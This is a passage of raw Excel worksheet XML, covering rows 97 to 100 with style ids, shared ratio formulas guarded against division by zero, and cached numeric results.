        <v>1.625</v>
      </c>
      <c r="AY97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AZ97" s="518">
        <f t="shared" si="106"/>
        <v>0.5</v>
      </c>
      <c r="BA97" s="518">
        <f t="shared" si="106"/>
        <v>13</v>
      </c>
      <c r="BB97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BC97" s="518">
        <f t="shared" si="106"/>
        <v>17812</v>
      </c>
      <c r="BD97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BE97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BF97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BG97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BH97" s="518">
        <f t="shared" si="106"/>
        <v>396</v>
      </c>
      <c r="BI97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BJ97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BK97" s="518">
        <f t="shared" si="106"/>
        <v>6.333333333</v>
      </c>
      <c r="BL97" s="518">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="BM97" s="518">
        <f t="shared" si="106"/>
        <v>45.66555286</v>
      </c>
      <c r="BN97" s="518">
        <f t="shared" si="106"/>
        <v>1.766795367</v>
      </c>
      <c r="BO97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BP97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BQ97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BR97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BS97" s="518">
        <f t="shared" si="106"/>
        <v>4.5</v>
      </c>
      <c r="BT97" s="518">
        <f t="shared" si="106"/>
        <v>2</v>
      </c>
      <c r="BU97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BV97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="BW97" s="518">
        <f t="shared" si="106"/>
        <v>4</v>
      </c>
      <c r="BX97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="BY97" s="518">
        <f t="shared" si="106"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ97" s="518">
        <f t="shared" si="106"/>
        <v>0.08130081301</v>
      </c>
      <c r="CA97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CB97" s="518">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="CC97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CD97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CE97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CF97" s="518">
        <f t="shared" si="106"/>
        <v>3</v>
      </c>
      <c r="CG97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CH97" s="518">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="CI97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CJ97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CK97" s="518">
        <f t="shared" si="106"/>
        <v>13</v>
      </c>
      <c r="CL97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CM97" s="518">
        <f t="shared" si="106"/>
        <v>81</v>
      </c>
      <c r="CN97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CO97" s="518">
        <f t="shared" si="106"/>
        <v>1.333333333</v>
      </c>
      <c r="CP97" s="518">
        <f t="shared" si="106"/>
        <v>20</v>
      </c>
      <c r="CQ97" s="518">
        <f t="shared" si="106"/>
        <v>3</v>
      </c>
      <c r="CR97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CS97" s="518">
        <f t="shared" si="106"/>
        <v>0.01114813272</v>
      </c>
      <c r="CT97" s="518">
        <f t="shared" si="106"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CV97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="CW97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="CX97" s="518">
        <f t="shared" si="106"/>
        <v>4.5</v>
      </c>
      <c r="CY97" s="518">
        <f t="shared" si="106"/>
        <v>16</v>
      </c>
      <c r="CZ97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="DA97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="DB97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="DC97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="DD97" s="518">
        <f t="shared" si="106"/>
        <v>5</v>
      </c>
      <c r="DE97" s="518">
        <f t="shared" si="106"/>
        <v>1.2</v>
      </c>
      <c r="DF97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="DG97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="DH97" s="518">
        <f t="shared" si="106"/>
        <v>1.053333333</v>
      </c>
      <c r="DI97" s="518">
        <f t="shared" si="106"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ97" s="519">
        <f t="shared" si="106"/>
        <v>1.181818182</v>
      </c>
      <c r="DK97" s="271"/>
      <c r="DO97" s="279"/>
      <c r="DP97" s="271"/>
      <c r="DU97" s="271"/>
      <c r="DV97" s="271"/>
      <c r="EA97" s="271"/>
      <c r="EB97" s="271"/>
      <c r="EC97" s="271"/>
      <c r="ED97" s="280"/>
      <c r="EG97" s="279"/>
      <c r="EH97" s="271"/>
      <c r="EI97" s="271"/>
      <c r="EJ97" s="271"/>
      <c r="EK97" s="271"/>
      <c r="EL97" s="271"/>
      <c r="EM97" s="271"/>
      <c r="EN97" s="271"/>
      <c r="EO97" s="271"/>
      <c r="EP97" s="271"/>
      <c r="EQ97" s="271"/>
      <c r="ER97" s="271"/>
      <c r="ES97" s="271"/>
      <c r="ET97" s="271"/>
      <c r="EU97" s="271"/>
      <c r="EV97" s="271"/>
      <c r="EW97" s="271"/>
      <c r="EX97" s="271"/>
      <c r="EY97" s="271"/>
      <c r="EZ97" s="271"/>
      <c r="FA97" s="280"/>
    </row>
    <row r="98">
      <c r="J98" s="277"/>
      <c r="K98" s="386" t="s">
        <v>2592</v>
      </c>
      <c r="L98" s="387" t="s">
        <v>2593</v>
      </c>
      <c r="M98" s="403" t="s">
        <v>2594</v>
      </c>
      <c r="N98" s="388" t="s">
        <v>2595</v>
      </c>
      <c r="O98" s="278"/>
      <c r="Q98" s="271"/>
      <c r="R98" s="352" t="s">
        <v>2566</v>
      </c>
      <c r="S98" s="501">
        <f t="shared" ref="S98:V98" si="107">S50/S$30</f>
        <v>0.272320446</v>
      </c>
      <c r="T98" s="501">
        <f t="shared" si="107"/>
        <v>0.004526034314</v>
      </c>
      <c r="U98" s="501">
        <f t="shared" si="107"/>
        <v>1.087301587</v>
      </c>
      <c r="V98" s="501">
        <f t="shared" si="107"/>
        <v>2.315789474</v>
      </c>
      <c r="W98" s="501">
        <f t="shared" si="104"/>
        <v>14</v>
      </c>
      <c r="X98" s="501">
        <f t="shared" ref="X98:AF98" si="108">X50/X$30</f>
        <v>7634.571429</v>
      </c>
      <c r="Y98" s="501">
        <f t="shared" si="108"/>
        <v>60.42857143</v>
      </c>
      <c r="Z98" s="501">
        <f t="shared" si="108"/>
        <v>19.39537354</v>
      </c>
      <c r="AA98" s="501">
        <f t="shared" si="108"/>
        <v>1.195965418</v>
      </c>
      <c r="AB98" s="501">
        <f t="shared" si="108"/>
        <v>10.73913043</v>
      </c>
      <c r="AC98" s="501">
        <f t="shared" si="108"/>
        <v>5.9</v>
      </c>
      <c r="AD98" s="501">
        <f t="shared" si="108"/>
        <v>0.01126856986</v>
      </c>
      <c r="AE98" s="501">
        <f t="shared" si="108"/>
        <v>5.222222222</v>
      </c>
      <c r="AF98" s="502">
        <f t="shared" si="108"/>
        <v>0.5220147634</v>
      </c>
      <c r="AG98" s="271"/>
      <c r="AH98" s="352" t="s">
        <v>2566</v>
      </c>
      <c r="AI98" s="518">
        <f t="shared" ref="AI98:DJ98" si="109">IF(AI$30=0,"-",AI50/AI$30)</f>
        <v>0.2719266055</v>
      </c>
      <c r="AJ98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="AK98" s="518">
        <f t="shared" si="109"/>
        <v>1.75</v>
      </c>
      <c r="AL98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="AM98" s="518">
        <f t="shared" si="109"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AO98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AP98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AQ98" s="518">
        <f t="shared" si="109"/>
        <v>0.9401709402</v>
      </c>
      <c r="AR98" s="518">
        <f t="shared" si="109"/>
        <v>1.75</v>
      </c>
      <c r="AS98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AT98" s="518">
        <f t="shared" si="109"/>
        <v>4</v>
      </c>
      <c r="AU98" s="518">
        <f t="shared" si="109"/>
        <v>6</v>
      </c>
      <c r="AV98" s="518">
        <f t="shared" si="109"/>
        <v>2</v>
      </c>
      <c r="AW98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AX98" s="518">
        <f t="shared" si="109"/>
        <v>1.6875</v>
      </c>
      <c r="AY98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="AZ98" s="518">
        <f t="shared" si="109"/>
        <v>1.5</v>
      </c>
      <c r="BA98" s="518">
        <f t="shared" si="109"/>
        <v>14</v>
      </c>
      <c r="BB98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BC98" s="518">
        <f t="shared" si="109"/>
        <v>17812.33333</v>
      </c>
      <c r="BD98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BE98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="BF98" s="518">
        <f t="shared" si="109"/>
        <v>1.5</v>
      </c>
      <c r="BG98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="BH98" s="518">
        <f t="shared" si="109"/>
        <v>396</v>
      </c>
      <c r="BI98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="BJ98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="BK98" s="518">
        <f t="shared" si="109"/>
        <v>8</v>
      </c>
      <c r="BL98" s="518">
        <f t="shared" si="109"/>
        <v>2</v>
      </c>
      <c r="BM98" s="518">
        <f t="shared" si="109"/>
        <v>47.13244228</v>
      </c>
      <c r="BN98" s="518">
        <f t="shared" si="109"/>
        <v>1.771235521</v>
      </c>
      <c r="BO98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BP98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BQ98" s="518">
        <f t="shared" si="109"/>
        <v>1.004901961</v>
      </c>
      <c r="BR98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BS98" s="518">
        <f t="shared" si="109"/>
        <v>5</v>
      </c>
      <c r="BT98" s="518">
        <f t="shared" si="109"/>
        <v>2</v>
      </c>
      <c r="BU98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BV98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="BW98" s="518">
        <f t="shared" si="109"/>
        <v>4</v>
      </c>
      <c r="BX98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="BY98" s="518">
        <f t="shared" si="109"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ98" s="518">
        <f t="shared" si="109"/>
        <v>1.081300813</v>
      </c>
      <c r="CA98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CB98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="CC98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="CD98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="CE98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CF98" s="518">
        <f t="shared" si="109"/>
        <v>4</v>
      </c>
      <c r="CG98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="CH98" s="518">
        <f t="shared" si="109"/>
        <v>3</v>
      </c>
      <c r="CI98" s="518">
        <f t="shared" si="109"/>
        <v>33</v>
      </c>
      <c r="CJ98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="CK98" s="518">
        <f t="shared" si="109"/>
        <v>13</v>
      </c>
      <c r="CL98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CM98" s="518">
        <f t="shared" si="109"/>
        <v>85.5</v>
      </c>
      <c r="CN98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="CO98" s="518">
        <f t="shared" si="109"/>
        <v>2.166666667</v>
      </c>
      <c r="CP98" s="518">
        <f t="shared" si="109"/>
        <v>21.5</v>
      </c>
      <c r="CQ98" s="518">
        <f t="shared" si="109"/>
        <v>3</v>
      </c>
      <c r="CR98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CS98" s="518">
        <f t="shared" si="109"/>
        <v>0.01116201583</v>
      </c>
      <c r="CT98" s="518">
        <f t="shared" si="109"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CV98" s="518">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="CW98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="CX98" s="518">
        <f t="shared" si="109"/>
        <v>5</v>
      </c>
      <c r="CY98" s="518">
        <f t="shared" si="109"/>
        <v>16</v>
      </c>
      <c r="CZ98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="DA98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="DB98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="DC98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="DD98" s="518">
        <f t="shared" si="109"/>
        <v>7</v>
      </c>
      <c r="DE98" s="518">
        <f t="shared" si="109"/>
        <v>1.6</v>
      </c>
      <c r="DF98" s="518">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="DG98" s="518" t="str">
        <f t="shared" si="109"/>
        <v>-</v>
      </c>
      <c r="DH98" s="518">
        <f t="shared" si="109"/>
        <v>1.055555556</v>
      </c>
      <c r="DI98" s="518">
        <f t="shared" si="109"/>
        <v>0.4982357731</v>
      </c>
      <c r="DJ98" s="519">
        <f t="shared" si="109"/>
        <v>1.363636364</v>
      </c>
      <c r="DK98" s="271"/>
      <c r="DO98" s="279"/>
      <c r="DP98" s="271"/>
      <c r="DU98" s="271"/>
      <c r="DV98" s="271"/>
      <c r="EA98" s="271"/>
      <c r="EB98" s="271"/>
      <c r="EC98" s="271"/>
      <c r="ED98" s="280"/>
      <c r="EG98" s="279"/>
      <c r="EH98" s="271"/>
      <c r="EI98" s="271"/>
      <c r="EJ98" s="271"/>
      <c r="EK98" s="271"/>
      <c r="EL98" s="271"/>
      <c r="EM98" s="271"/>
      <c r="EN98" s="520" t="s">
        <v>2596</v>
      </c>
      <c r="ER98" s="271"/>
      <c r="ES98" s="271"/>
      <c r="ET98" s="271"/>
      <c r="EU98" s="271"/>
      <c r="EV98" s="271"/>
      <c r="EW98" s="271"/>
      <c r="EX98" s="271"/>
      <c r="EY98" s="271"/>
      <c r="EZ98" s="271"/>
      <c r="FA98" s="280"/>
    </row>
    <row r="99">
      <c r="J99" s="277"/>
      <c r="K99" s="500">
        <f t="shared" ref="K99:N99" si="110">K64/$N$31</f>
        <v>0.0375917641</v>
      </c>
      <c r="L99" s="501">
        <f t="shared" si="110"/>
        <v>0.0375917641</v>
      </c>
      <c r="M99" s="501">
        <f t="shared" si="110"/>
        <v>7.553340584</v>
      </c>
      <c r="N99" s="502">
        <f t="shared" si="110"/>
        <v>7.553340584</v>
      </c>
      <c r="O99" s="278"/>
      <c r="Q99" s="271"/>
      <c r="R99" s="352" t="s">
        <v>2567</v>
      </c>
      <c r="S99" s="501">
        <f t="shared" ref="S99:V99" si="111">S51/S$30</f>
        <v>2.103367324</v>
      </c>
      <c r="T99" s="501">
        <f t="shared" si="111"/>
        <v>0.03958321165</v>
      </c>
      <c r="U99" s="501">
        <f t="shared" si="111"/>
        <v>1.682539683</v>
      </c>
      <c r="V99" s="501">
        <f t="shared" si="111"/>
        <v>4.631578947</v>
      </c>
      <c r="W99" s="501">
        <f t="shared" si="104"/>
        <v>35</v>
      </c>
      <c r="X99" s="501">
        <f t="shared" ref="X99:AF99" si="112">X51/X$30</f>
        <v>15775.85714</v>
      </c>
      <c r="Y99" s="501">
        <f t="shared" si="112"/>
        <v>82.85714286</v>
      </c>
      <c r="Z99" s="501">
        <f t="shared" si="112"/>
        <v>45.72158622</v>
      </c>
      <c r="AA99" s="501">
        <f t="shared" si="112"/>
        <v>1.423631124</v>
      </c>
      <c r="AB99" s="501">
        <f t="shared" si="112"/>
        <v>17.95652174</v>
      </c>
      <c r="AC99" s="501">
        <f t="shared" si="112"/>
        <v>10.3</v>
      </c>
      <c r="AD99" s="501">
        <f t="shared" si="112"/>
        <v>0.04696378449</v>
      </c>
      <c r="AE99" s="501">
        <f t="shared" si="112"/>
        <v>9.666666667</v>
      </c>
      <c r="AF99" s="502">
        <f t="shared" si="112"/>
        <v>0.567433782</v>
      </c>
      <c r="AG99" s="271"/>
      <c r="AH99" s="352" t="s">
        <v>2567</v>
      </c>
      <c r="AI99" s="518">
        <f t="shared" ref="AI99:DJ99" si="113">IF(AI$30=0,"-",AI51/AI$30)</f>
        <v>2.102311927</v>
      </c>
      <c r="AJ99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="AK99" s="518">
        <f t="shared" si="113"/>
        <v>5.75</v>
      </c>
      <c r="AL99" s="518">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="AM99" s="518">
        <f t="shared" si="113"/>
        <v>0.03958321165</v>
      </c>
      <c r="AN99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AO99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AP99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AQ99" s="518">
        <f t="shared" si="113"/>
        <v>1.05982906</v>
      </c>
      <c r="AR99" s="518">
        <f t="shared" si="113"/>
        <v>3.25</v>
      </c>
      <c r="AS99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AT99" s="518">
        <f t="shared" si="113"/>
        <v>40</v>
      </c>
      <c r="AU99" s="518">
        <f t="shared" si="113"/>
        <v>14.5</v>
      </c>
      <c r="AV99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="AW99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AX99" s="518">
        <f t="shared" si="113"/>
        <v>2.5625</v>
      </c>
      <c r="AY99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="AZ99" s="518">
        <f t="shared" si="113"/>
        <v>6</v>
      </c>
      <c r="BA99" s="518">
        <f t="shared" si="113"/>
        <v>35</v>
      </c>
      <c r="BB99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BC99" s="518">
        <f t="shared" si="113"/>
        <v>36758.66667</v>
      </c>
      <c r="BD99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BE99" s="518">
        <f t="shared" si="113"/>
        <v>147</v>
      </c>
      <c r="BF99" s="518">
        <f t="shared" si="113"/>
        <v>2.5</v>
      </c>
      <c r="BG99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="BH99" s="518">
        <f t="shared" si="113"/>
        <v>397</v>
      </c>
      <c r="BI99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="BJ99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="BK99" s="518">
        <f t="shared" si="113"/>
        <v>10</v>
      </c>
      <c r="BL99" s="518">
        <f t="shared" si="113"/>
        <v>4</v>
      </c>
      <c r="BM99" s="518">
        <f t="shared" si="113"/>
        <v>82.4671932</v>
      </c>
      <c r="BN99" s="518">
        <f t="shared" si="113"/>
        <v>22.37702703</v>
      </c>
      <c r="BO99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BP99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BQ99" s="518">
        <f t="shared" si="113"/>
        <v>1.019607843</v>
      </c>
      <c r="BR99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BS99" s="518">
        <f t="shared" si="113"/>
        <v>7</v>
      </c>
      <c r="BT99" s="518">
        <f t="shared" si="113"/>
        <v>5</v>
      </c>
      <c r="BU99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BV99" s="518">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="BW99" s="518">
        <f t="shared" si="113"/>
        <v>12</v>
      </c>
      <c r="BX99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="BY99" s="518">
        <f t="shared" si="113"/>
        <v>7.888888889</v>
      </c>
      <c r="BZ99" s="518">
        <f t="shared" si="113"/>
        <v>1.105691057</v>
      </c>
      <c r="CA99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CB99" s="518">
        <f t="shared" si="113"/>
        <v>6</v>
      </c>
      <c r="CC99" s="518">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="CD99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="CE99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CF99" s="518">
        <f t="shared" si="113"/>
        <v>9</v>
      </c>
      <c r="CG99" s="518">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="CH99" s="518">
        <f t="shared" si="113"/>
        <v>10</v>
      </c>
      <c r="CI99" s="518">
        <f t="shared" si="113"/>
        <v>35</v>
      </c>
      <c r="CJ99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="CK99" s="518">
        <f t="shared" si="113"/>
        <v>19</v>
      </c>
      <c r="CL99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CM99" s="518">
        <f t="shared" si="113"/>
        <v>152</v>
      </c>
      <c r="CN99" s="518">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="CO99" s="518">
        <f t="shared" si="113"/>
        <v>4</v>
      </c>
      <c r="CP99" s="518">
        <f t="shared" si="113"/>
        <v>32.5</v>
      </c>
      <c r="CQ99" s="518">
        <f t="shared" si="113"/>
        <v>13</v>
      </c>
      <c r="CR99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CS99" s="518">
        <f t="shared" si="113"/>
        <v>0.04702207414</v>
      </c>
      <c r="CT99" s="518">
        <f t="shared" si="113"/>
        <v>0.01097804391</v>
      </c>
      <c r="CU99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CV99" s="518">
        <f t="shared" si="113"/>
        <v>7</v>
      </c>
      <c r="CW99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="CX99" s="518">
        <f t="shared" si="113"/>
        <v>12.5</v>
      </c>
      <c r="CY99" s="518">
        <f t="shared" si="113"/>
        <v>21.5</v>
      </c>
      <c r="CZ99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="DA99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="DB99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="DC99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="DD99" s="518">
        <f t="shared" si="113"/>
        <v>19</v>
      </c>
      <c r="DE99" s="518">
        <f t="shared" si="113"/>
        <v>3</v>
      </c>
      <c r="DF99" s="518">
        <f t="shared" si="113"/>
        <v>10</v>
      </c>
      <c r="DG99" s="518" t="str">
        <f t="shared" si="113"/>
        <v>-</v>
      </c>
      <c r="DH99" s="518">
        <f t="shared" si="113"/>
        <v>2.071111111</v>
      </c>
      <c r="DI99" s="518">
        <f t="shared" si="113"/>
        <v>0.5020356464</v>
      </c>
      <c r="DJ99" s="519">
        <f t="shared" si="113"/>
        <v>1.636363636</v>
      </c>
      <c r="DK99" s="271"/>
      <c r="DO99" s="279"/>
      <c r="DP99" s="271"/>
      <c r="DU99" s="271"/>
      <c r="DV99" s="271"/>
      <c r="EA99" s="271"/>
      <c r="EB99" s="271"/>
      <c r="EC99" s="271"/>
      <c r="ED99" s="280"/>
      <c r="EG99" s="279"/>
      <c r="EH99" s="271"/>
      <c r="EI99" s="271"/>
      <c r="EJ99" s="271"/>
      <c r="EK99" s="271"/>
      <c r="EL99" s="271"/>
      <c r="EM99" s="271"/>
      <c r="ER99" s="271"/>
      <c r="ES99" s="271"/>
      <c r="ET99" s="271"/>
      <c r="EU99" s="271"/>
      <c r="EV99" s="271"/>
      <c r="EW99" s="271"/>
      <c r="EX99" s="271"/>
      <c r="EY99" s="271"/>
      <c r="EZ99" s="271"/>
      <c r="FA99" s="280"/>
    </row>
    <row r="100">
      <c r="J100" s="277"/>
      <c r="K100" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="L100" s="403" t="s">
        <v>2547</v>
      </c>
      <c r="M100" s="403" t="s">
        <v>2548</v>
      </c>
      <c r="N100" s="404" t="s">
        <v>2549</v>
      </c>
      <c r="O100" s="278"/>
      <c r="Q100" s="271"/>
      <c r="R100" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="S100" s="501">
        <f t="shared" ref="S100:V100" si="114">IF(S$34=0,"-",S52/S$34)</f>
        <v>0.0004840271055</v>
      </c>
      <c r="T100" s="501" t="str">
        <f t="shared" si="114"/>
        <v>-</v>
      </c>
      <c r="U100" s="501">
        <f t="shared" si="114"/>
        <v>0.007936507937</v>
      </c>
      <c r="V100" s="501">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="W100" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X100" s="501">
        <f t="shared" ref="X100:AF100" si="115">IF(X$34=0,"-",X52/X$34)</f>
        <v>0</v>
      </c>
      <c r="Y100" s="501">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="Z100" s="501">
        <f t="shared" si="115"/>
        <v>0.06680042488</v>
      </c>
      <c r="AA100" s="501">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="AB100" s="501">
        <f t="shared" si="115"/>
        <v>0.04347826087</v>
      </c>
      <c r="AC100" s="501">
        <f t="shared" si="115"/>
        <v>0.1</v>
      </c>
      <c r="AD100" s="501">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="AE100" s="501">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="AF100" s="502">
        <f t="shared" si="115"/>
        <v>0.03896103896</v>
      </c>
      <c r="AG100" s="271"/>
      <c r="AH100" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="AI100" s="518">
        <f t="shared" ref="AI100:DJ100" si="116">IF(AI$30=0,"-",AI52/AI$30)</f>
        <v>0</v>
      </c>
      <c r="AJ100" s="518">
        <f t="shared" si="116"/>
        <v>1</v>
      </c>
      <c r="AK100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AL100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AM100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AN100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AO100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AP100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AQ100" s="518">
        <f t="shared" si="116"/>
        <v>0.008547008547</v>
      </c>
      <c r="AR100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
